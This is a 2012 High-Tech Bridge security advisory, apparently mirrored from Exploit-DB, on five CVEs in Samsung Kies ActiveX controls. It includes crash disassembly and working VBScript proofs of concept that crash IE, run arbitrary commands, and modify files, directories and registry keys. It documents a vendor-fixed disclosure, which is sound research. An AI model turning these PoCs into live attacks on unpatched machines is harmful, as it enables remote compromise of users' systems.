Samsung Kies 2.3.2.12054_20 – Multiple Vulnerabilities

• Exploit Database
• 35 阅读

• 作者： High-Tech Bridge SA
  日期： 2012-10-16
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/22007/

• Advisory ID: HTB23099
  Product: Samsung Kies
  Vendor: Samsung Electronics
  Vulnerable Version(s): 2.3.2.12054_20 and probably prior
  Tested Version: 2.3.2.12054_20
  Vendor Notification: June 25, 2012 
  Public Disclosure: October 15, 2012 
  Vulnerability Type: NULL Pointer Dereference [CWE-476], Improper Access Control [CWE-284], Improper Access Control [CWE-284], Improper Access Control [CWE-284], Improper Access Control [CWE-284]
  CVE References: CVE-2012-3806, CVE-2012-3807, CVE-2012-3808, CVE-2012-3809, CVE-2012-3810
  CVSSv2 Base Scores: 4.3 (AV:N/AC:M/Au:N/C:N/I:N/A:P), 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P), 5.8 (AV:N/AC:M/Au:N/C:N/I:P/A:P),5.8 (AV:N/AC:M/Au:N/C:N/I:P/A:P),5.8 (AV:N/AC:M/Au:N/C:N/I:P/A:P)
  Solution Status: Fixed by Vendor
  Risk Level: Medium 
  Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 
  
  -----------------------------------------------------------------------------------------------
  
  Advisory Details:
  
  High-Tech Bridge Security Research Lab has discovered multiple vulnerabilities in Samsung Kies synchronization utility that allows remote attacker to compromise affected system, execute and modify arbitrary files, modify arbitrary directories and modify System Registry with privileges of the current user. 
  
  
  1) Null Pointer Dereference in Samsung Kies: CVE-2012-3806
  
  The vulnerability exists due to a null pointer dereference error in GetDataTable() method within the Samsung.DeviceService.DCA.DeviceDataParagonATGM.1 ActiveX control (DCAPARAGONGM.dll, GUID {7650BC47-036D-4D5B-95B4-9D622C8D00A4}, located by default in "C:\Program Files(x86)\Samsung\Kies\External\DeviceModules\"). A remote attacker can pass "tagDATATABLE_SUID" argument equal to 0 to the GetDataTable() method and rise an ACCESS_VIOLATION exception on a MOV EDX,[EAX] instruction, as EAX is previously zeroed by an unexpected NULL value in the memory region pointed by ECX:
  
  
  Disassembly:
  --------------------------------------------------
  2A22B95 MOV ECX,[EBP+10]
  2A22B98 MOV EAX,[ECX]
  2A22B9AMOV EDX,[EAX]//Crash through
  Null Pointer Dereference
  2A22B9CPUSH 0
  2A22B9E PUSH 0
  2A22BA0PUSH 2A71E68
  2A22BA5PUSH EAX
  2A22BA6MOV EAX,[EDX+50]
  2A22BA9CALL EAX
  
  Registers:
  --------------------------------------------------
  EIP 02A22B9A
  EAX 00000000
  EBX 02A66774 -> 029E58F0
  ECX 0022EBC0 -> 00000000
  EDX 006DFCE2 -> 00030000
  EDI 00000000
  ESI 00000000
  EBP 0022EB5C -> 0022EB7C
  ESP 0022EB38 -> F2D508FE
  
  
  
  The following Proof of Concept code causes a browser to crash:
  
  
  <html>
  <!-- (c)oded by Frederic Bourla, High-Tech Bridge -->
   <head>
   <title>Multiple vulnerabilities in Samsung Kies v.2.3.2.12054_20</title>
   </head>
   <script language='vbscript'>
   Sub daPoC()
   arg1=0
   daTarget.GetDataTable arg1
   End Sub
   </script>
   <body>
   <h3>Multiple vulnerabilities in Samsung Kies v.2.3.2.12054_20</h3>
   <h4>Null Pointer Dereference PoC</h4>
   <hr>
   This simple PoC will crash Internet Explorer.<BR><BR>
   <input language=VBScript onclick=daPoC() type=button value="Proof of Concept">
   </body>
   <object classid='clsid:7650BC47-036D-4D5B-95B4-9D622C8D00A4'
  id='daTarget'></object>
  </html>
  
  
  
  2) Arbitrary File Execution in Samsung Kies: CVE-2012-3807
  
  The CmdAgent.dll library, located by default in "C:\Program Files (x86)\Samsung\Kies\External\FirmwareUpdate\", has numerous arbitrary file execution vulnerabilities present in "CmdAgentLib" (GUID: {1FA56F8D-A66E-4ABD-9BC9-6F61469E59AD}), in particular in the 'ICommandAgent' interface of the "CommandAgent" class (GUID: {C668B648-A2BD-432C-854F-C8C0A275E1F1}). This default "ICommandAgent" interface has multiple functions and methods, and most of them can be leveraged by an untrusted source.
  
  
  Arbitrary File Execution:
  
  Run=> Vulnerable
  RunAt=> Initial Exploit Test failed
  RunAtNotExit => Initial Exploit Test failed
  RunNotExit => Vulnerable
  
  
  
  Arbitrary File Execution Proof of Concept:
  
  
  <html>
  <!-- (c)oded by Frederic Bourla, High-Tech Bridge -->
   <head>
   <title>Multiple vulnerabilities in Samsung Kies v.2.3.2.12054_20</title>
   </head>
   <script language='vbscript'>
   Sub daPoC()
   daFile="iexplore https://www.htbridge.com/advisory/HTB23099"
   daTarget.Run daFile
   End Sub
   </script>
   <body>
   <h3>Multiple vulnerabilities in Samsung Kies v.2.3.2.12054_20</h3>
   <h4>Arbitrary File Execution PoC</h4>
   <hr>
   This simple PoC will spawn IE and display more information about the vulnerability.<BR><BR>
   <input language=VBScript onclick=daPoC() type=button value="Proof of Concept">
   </body>
   <object classid='clsid:C668B648-A2BD-432C-854F-C8C0A275E1F1' id='daTarget'></object>
  </html>
  
  
  
  3) Arbitrary File Modification in Samsung Kies: CVE-2012-3808
  
  The CmdAgent.dll library, located by default in "C:\Program Files (x86)\Samsung\Kies\External\FirmwareUpdate\", has numerous arbitrary file modification vulnerabilities present in "CmdAgentLib" (GUID: {1FA56F8D-A66E-4ABD-9BC9-6F61469E59AD}), in particular in the 'ICommandAgent' interface of the "CommandAgent" class (GUID: {C668B648-A2BD-432C-854F-C8C0A275E1F1}). This default "ICommandAgent" interface has multiple functions and methods, and most of them can be leveraged by an untrusted source.
  
  
  Arbitrary File Modification:
  
  FileCopy => Vulnerable
  FileCopySync => Vulnerable
  FileDelete => Vulnerable
  FileMove => Vulnerable
  FileMoveExReboot => Initial Exploit Test failed
  FileMoveSync => Vulnerable
  
  
  
  Arbitrary File Modification Proof of Concept:
  
  
  <html>
  <!-- (c)oded by Frederic Bourla, High-Tech Bridge -->
   <head>
   <title>Multiple vulnerabilities in Samsung Kies v.2.3.2.12054_20</title>
   </head>
   <script language='vbscript'>
   Set daShell = CreateObject( "WScript.Shell" )
   daRoot=daShell.ExpandEnvironmentStrings("%SystemRoot%")
   daFileCopySource=daRoot & "\System32\drivers\etc\hosts" daProfile=daShell.ExpandEnvironmentStrings("%USERPROFILE%")
   daFileCopyDest=daprofile & "\Desktop\hosts"
   daFileMoveDest=daprofile & "\Desktop\hosts.backup"
   Sub daPoC()
   daTarget.FileCopy daFileCopySource, daFileCopyDest
   End Sub
   Sub daPoC2()
   daTarget.FileMoveSync daFileCopyDest, daFileMoveDest
   End Sub
   Sub daPoC3()
   daTarget.FileDelete daFileMoveDest
   End Sub
   </script>
   <body>
   <h3>Multiple vulnerabilities in Samsung Kies v.2.3.2.12054_20</h3>
   <h4>Arbitrary File Modification PoC</h4>
   <hr>
   This simple PoC will copy your <script language='vbscript'>document.write(daFileCopySource)</script> file into your desktop.<BR><BR>
  <input language=VBScript onclick=daPoC() type=button value="Proof of Concept">
   <hr>
   This simple PoC will move your <script language='vbscript'>document.write(daFileCopyDest)</script> file into <script language='vbscript'>document.write(daFileMoveDest)</script>.<BR><BR>
   <input language=VBScript onclick=daPoC2() type=button value="Proof
  of Concept">
   <hr>
   This simple PoC will delete <script language='vbscript'>document.write(daFileMoveDest)</script>.<BR><BR>
   <input language=VBScript onclick=daPoC3() type=button value="Proof of Concept">
   </body>
   <object classid='clsid:C668B648-A2BD-432C-854F-C8C0A275E1F1' id='daTarget'></object>
  
  </html>
  
  
  
  4) Arbitrary Directory Modification in Samsung Kies: CVE-2012-3809
  
  The CmdAgent.dll library, located by default in "C:\Program Files (x86)\Samsung\Kies\External\FirmwareUpdate\", has numerous arbitrary directory modification vulnerabilities present in "CmdAgentLib" (GUID: {1FA56F8D-A66E-4ABD-9BC9-6F61469E59AD}), in particular in the 'ICommandAgent' interface of the "CommandAgent" class (GUID: {C668B648-A2BD-432C-854F-C8C0A275E1F1}). This default "ICommandAgent" interface has multiple functions and methods, and most of them can be leveraged by an untrusted source.
  
  
  Arbitrary Directory Modification:
  
  DirCreate=> Vulnerable
  DirDelete=> Vulnerable
  
  
  
  Arbitrary Directory Modification Proof of Concept:
  
  
  <html>
  <!-- (c)oded by Frederic Bourla, High-Tech Bridge -->
   <head>
   <title>Multiple vulnerabilities in Samsung Kies v.2.3.2.12054_20</title>
   </head>
   <script language='vbscript'>
   Set daShell = CreateObject( "WScript.Shell" )
   daProfile=daShell.ExpandEnvironmentStrings("%USERPROFILE%")
   daDir=daprofile & "\Desktop\FRoGito"
   Sub daPoC()
   daTarget.DirCreate daDir
   End Sub
   Sub daPoC2()
   daTarget.DirDelete daDir
   End Sub
   </script>
   <body>
   <h3>Multiple vulnerabilities in Samsung Kies v.2.3.2.12054_20</h3>
   <h4>Arbitrary Directory Modification PoC</h4>
   <hr>
   This simple PoC will create the <script language='vbscript'>document.write(daDir)</script> directory.<BR><BR>
   <input language=VBScript onclick=daPoC() type=button value="Proof of Concept">
   <hr>
   This simple PoC will delete the <script language='vbscript'>document.write(daDir)</script> directory.<BR><BR>
   <input language=VBScript onclick=daPoC2() type=button value="Proof of Concept">
   </body>
   <object classid='clsid:C668B648-A2BD-432C-854F-C8C0A275E1F1' id='daTarget'></object>
  </html>
  
  
  
  5) Arbitrary Registry Modification in Samsung Kies: CVE-2012-3810
  
  The CmdAgent.dll library, located by default in "C:\Program Files (x86)\Samsung\Kies\External\FirmwareUpdate\", has numerous Registry modification vulnerabilities present in "CmdAgentLib" (GUID: {1FA56F8D-A66E-4ABD-9BC9-6F61469E59AD}), in particular in the 'ICommandAgent' interface of the "CommandAgent" class (GUID: {C668B648-A2BD-432C-854F-C8C0A275E1F1}). This default "ICommandAgent" interface has multiple functions and methods, and most of them can be leveraged by an untrusted source.
  
  
  Arbitrary Registry Modification:
  
  RegiCreateKey=> Vulnerable
  RegiDeleteKey=> Vulnerable
  RegiDeleteTree => Vulnerable
  RegiDeleteValue=> Vulnerable
  RegiSetValueInt=> Vulnerable
  RegiSetValueInt64=> Vulnerable
  RegiSetValueString => Vulnerable
  RegiSetValueString64 => Vulnerable
  
  
  
  Arbitrary Registry Modification Proof of Concept:
  
  
  <html>
  <!-- (c)oded by Frederic Bourla, High-Tech Bridge -->
   <head>
   <title>Multiple vulnerabilities in Samsung Kies v.2.3.2.12054_20</title>
   </head>
   <script language="vbscript">
  daReg = "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\FRoGito" 
  
  daValueStrName = "PoC_str"
  daValueStr = "frederic.bourla@htbridge.com"
  daValueIntName = "PoC_int"
  daValueInt = 8080
  
  Sub daPoC()
  daTarget.RegiCreateKey daReg
  End Sub
  Sub daPoC2()
  daTarget.RegiSetValueString daReg, daValueStrName, daValueStr
  End Sub
  Sub daPoC3()
  daTarget.RegiSetValueInt daReg, daValueIntName, daValueInt
  End Sub
  Sub daPoC4()
  daTarget.RegiDeleteValue daReg, daValueStrName
  daTarget.RegiDeleteValue daReg, daValueIntName
  End Sub
  Sub daPoC5()
  daTarget.RegiDeleteKey daReg
  End Sub
  
   </script>
  
   <body>
   <h3>Multiple vulnerabilities in Samsung Kies v.2.3.2.12054_20</h3>
   <h4>Arbitrary Registry Modification PoC</h4>
   <hr>
   This simple PoC will create the HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\FRoGito
  registry key.<BR><BR>
   <input language=VBScript onclick=daPoC() type=button value="Proof
  of Concept">
   <hr>
  This simple PoC will create the string value 'PoC_str' initialized to 'frederic.bourla@htbridge.com' in the HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\FRoGitoregistry key.<BR><BR>
   <input language=VBScript onclick=daPoC2() type=button value="Proof of Concept">
   <hr>
   This simple PoC will create the int value 'PoC_int' initialized to 0x1F90 in the HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\FRoGito
  registry key.
   <BR><BR>
   <input language=VBScript onclick=daPoC3() type=button
  value="Proof of Concept">
  <hr>
   This simple PoC will delete both string and hex values from the HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\FRoGito registry key
   <BR><BR>
   <input language=VBScript onclick=daPoC4() type=button value="Proof of Concept"> 
   <hr>
   This simple PoC will delete the HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\FRoGito registry key.
   <BR><BR>
   <input language=VBScript onclick=daPoC5() type=button value="Proof of Concept">
   </body>
   <object classid='clsid:C668B648-A2BD-432C-854F-C8C0A275E1F1'
  id='daTarget'></object>
  </html>
  
  
  
  
  -----------------------------------------------------------------------------------------------
  
  Solution:
  
  Upgrade to KIES v2.5.0.12094_27_11
  
  -----------------------------------------------------------------------------------------------
  
  References:
  
  [1] High-Tech Bridge Advisory HTB23099 - https://www.htbridge.com/advisory/HTB23099 - Multiple vulnerabilities in Samsung Kies.
  [2] Samsung Kies - http://www.samsung.com/ca/support/usefulsoftware/KIES/JSP - Samsung Kies is a freeware software application used to communicate between Windows or Macintosh computers, and more recently-manufactured Samsung mobile phone and tablet computer devices. Kies is Samsung's official tool for Android based devices which allows synchronization and multimedia files management.
  [3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
  [4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. 
  
  -----------------------------------------------------------------------------------------------
  
  Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.